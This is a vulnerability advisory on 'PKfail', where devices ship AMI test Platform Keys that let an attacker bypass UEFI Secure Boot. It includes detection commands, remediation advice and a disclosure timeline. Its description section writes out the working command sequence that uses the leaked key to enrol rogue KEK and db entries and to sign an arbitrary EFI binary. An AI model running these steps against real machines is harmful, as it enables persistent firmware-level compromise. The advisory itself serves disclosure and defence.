[BRLY-2024-005] Usage of default test keys leads to complete Secure Boot bypass

Introduction

The Binarly REsearch Team has found that hundreds of devices use an insecure Platform Key (PK) which represents the root of trust for UEFI Secure Boot.

These insecure keys were generated by American Megatrends International (AMI) and were likely supplied as reference example to device vendors.

The usage of default test keys poses an immediate and high-severity risk as it makes it trivial to defeat Secure Boot on affected devices, allowing malicious actors to launch advanced firmware-level threats, such as BlackLotus, from the operating system.

Given the wide scope of this vulnerability, which affects multiple vendors and several consumer- and enterprise-grade devices, we will refer to it as PKfail.

Vulnerability Information

• BINARLY internal vulnerability identifier: BRLY-2024-005
• Intel advisory: https://www.intel.com/content/www/us/en/security-center/announcement/intel-security-announcement-2024-07-25-001.html‍
• Supermicro advisory: https://www.supermicro.com/en/support/security_PKFAIL_Jul_2024
• Dell advisory: https://www.dell.com/support/kbdoc/en-us/000227594/dsa-2024-354
• Fujitsu advisory: https://security.ts.fujitsu.com/ProductSecurity/content/Fujitsu-PSIRT-FJ-ISS-2024-072412-Security-Notice.pdf‍
• CERT/CC assigned case number: VU#455367‍
• CVE record on cve.org: CVE-2024-8105‍
• CVE record on NVD: CVE-2024-8105‍
• CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Vulnerability Summary

Secure Boot is a security feature that ensures only trusted and verified software runs during the boot process.

Secure Boot relies on four key databases:

1. Platform Key (PK): The root of trust key embedded in the system firmware, establishes trust between the platform owner and platform firmware.

2. Key Exchange Key (KEK): A key used to administer db and dbx, establishing trust between the operating system and the platform firmware.

3. Signature Database (db): A database containing trusted signatures and certificates for third party UEFI components and boot loaders.

4. Forbidden Signature Database (dbx): A database containing signatures for known malicious software.

These components create a chain of trust, preventing unauthorized or malicious software from compromising the system during the boot process.

PKfail is the result of device vendors using as Platform Key a default test key provided by AMI.

Since these keys were generated for testing purposes and thus likely supplied as part of AMI UEFI solution, they should be assumed untrusted and compromised.

In particular, we identified the private part of a Platform Key in a recent data breach that affected an ODM working with AMI.

As shown in the next section, owning this private key makes it extremely straightforward to manipulate the content of db and dbx.

Since these databases are used by UEFI firmware to determine whether third-party UEFI modules and bootloaders are allowed to execute or must be forbidden, an attacker leveraging PKfail can easily run malicious code during the boot process even on devices where Secure Boot is enabled.

Vulnerability description

The attack starts by generating new keys and certificates by using the openssl command:

openssl req -newkey rsa:4096 -nodes -keyout KEK.key -new -x509 -sha256 -days 3650 -subj "/CN=BRLY KEK/" -out KEK.crt
openssl req -newkey rsa:4096 -nodes -keyout db.key -new -x509 -sha256 -days 3650 -subj "/CN=BRLY db/" -out db.crt

Next, the private part of AMI test PK (PK.key), which was leaked during a recent data breach, can be used to append the freshly generated KEK certificate (KEK.crt) to the KEK database:

sudo efi-updatevar -a -c KEK.crt -k PK.key KEK

Then, the corresponding KEK private key (KEK.key) can be used to update the db database with the new certificate (db.crt):

sudo efi-updatevar -a -c db.crt -k KEK.key db

At this point executing untrusted code during boot--even when Secure Boot is enabled--is straightforward, as any EFI binary can be signed with the db key:

sbsign --key db.key --cert db.crt --output rogue.efi.signed rogue.efi

As an alternative, it is also possible to append the binary hash of the rogue EFI binary to the db database:

sudo efi-updatevar -a -b rogue.efi -k KEK.key db

The Binarly REsearch Team confirmed these steps on a Gigabyte GB-BER5(HS)-5500, which is using the leaked Platform Key.

Detection

Devices affected by PKfail will have the Platform Key certificate's subject and issuer fields containing the string DO NOT TRUST or DO NOT SHIP.

On Linux devices, PKfail can be detected by inspecting the content of the PK variable:

$ efi-readvar -v PK
Variable PK, length 862
PK: List 0, type X509
    Signature 0, size 834, owner 26dc4851-195f-4ae1-9a19-fbf883bbb35e
        Subject:
            CN=DO NOT TRUST - AMI Test PK
        Issuer:
            CN=DO NOT TRUST - AMI Test PK

On Windows devices, the following command run from a PowerShell administrator console will print True on devices affected by PKfail:

[System.Text.Encoding]::ASCII.GetString((Get-SecureBootUEFI PK).bytes) -match "DO NOT TRUST|DO NOT SHIP"

Preliminary list of affected devices

To evaluate the impact of PKfail, we analyzed an internal dataset of UEFI firmware with our Binarly Transparency Platform. For a complete list of untrusted PKs identified by the Binarly Transparency Platform, visit this GitHub page.

How to fix it

Addressing PKfail requires rekeying on affected devices the Platform Key with a new trusted key.

Devices affected by PKfail must be assumed compromised and thus KEK, db and dbx must also be checked and replaced with new databases of trusted signatures and certificates.

Disclosure timeline

This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Acknowledgements

The Binarly REsearch Team